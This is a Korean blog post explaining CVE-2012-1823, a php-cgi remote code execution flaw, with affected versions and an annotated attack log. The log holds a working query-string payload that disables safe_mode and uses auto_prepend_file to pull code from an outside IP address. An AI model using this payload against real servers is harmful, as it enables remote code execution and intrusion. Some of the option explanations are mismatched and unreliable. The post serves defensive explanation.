티스토리 뷰

 내용

  • Apache / PHP 5.x 에서 발생되는 원격 코드 실행 취약점
정보

참고자료

취약 버전

  • 5.4.2 이전 버전의 5.3.12, 5.4.x PHP에 있는 sapi/cgi/cgi_main.c

CGI 스크립트 (php-cgi)가 설정될 때, 할당 명령이 있는 스트링을 정상적으로 다루지 못해 취약점이 발생됩니다. 이것은 공격자가 옵션 쿼리 스트링을 이용하여 command-line을 넣어 임의의 실행을 가능하도록 합니다. 이 것은 php_getopt의 'd' 옵션의 취약점과 관련되어 있습니다.


아래는 CVE-2012-1823 취약점에 대한 내용입니다.


참고 레퍼런스


CVE-2012-1823을 시도하는 웹 로그는 아래와 같습니다.


 bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"


위 로그의 내용은 아래와 같습니다.

  • safe_mode=off: 파일 owner에 의한 실행 확인 설정을 해제. 이 설정은 PHP 5.3.0에서 비추천하며, 5.4.0에서는 삭제되었습니다.
  • disable_functions=null: PHP가 http 또는 ftp 위치의 파일을 열 수 있도록 합니다.
  • allow_url_fopen=on: process가 실행되기 전에 http 또는 ftp 위치에 추가적인 PHP 코드를 삽입할 수 있습니다.
  •  auto_prepend_file=http://81.17.24.82/info3.php: index.php가 실행되기 전에 http://81.17.24.82/info3.php를 실행시킵니다.

윈도우 사용자의 경우 CVE-2012-2376에 영향을 받을 수 있습니다.



댓글